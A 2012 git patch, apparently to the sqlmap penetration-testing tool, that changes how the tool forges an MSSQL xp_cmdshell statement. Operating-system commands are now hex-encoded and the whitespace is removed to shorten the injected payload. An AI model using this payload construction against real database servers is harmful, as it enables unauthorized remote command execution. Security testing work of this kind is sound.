From 18be319d1383559ac5e458a9150165ac8bb4fcd7 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Sun, 1 Jul 2012 23:41:10 +0100
Subject: [PATCH] hexencoding the command is much shorter than unescaping with
 CHAR() for MSSQL, also no need for spaces between nested comments when
 forging the xp_cmdshell command to run

---
 lib/takeover/xp_cmdshell.py | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index 20a0236f1..89f81ce31 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -14,6 +14,7 @@ from lib.core.common import popValue
 from lib.core.common import randomStr
 from lib.core.common import readInput
 from lib.core.common import wasLastRequestDelayed
+from lib.core.convert import hexencode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@@ -148,9 +149,9 @@ class xp_cmdshell:
 
     def xpCmdshellForgeCmd(self, cmd):
         self.__randStr = randomStr(lowercase=True)
-        self.__cmd = unescaper.unescape("'%s'" % cmd)
-        self.__forgedCmd = "DECLARE @%s VARCHAR(8000); " % self.__randStr
-        self.__forgedCmd += "SET @%s = %s; " % (self.__randStr, self.__cmd)
+        self.__cmd = "0x%s" % hexencode(cmd)
+        self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr
+        self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
         self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
 
         return self.__forgedCmd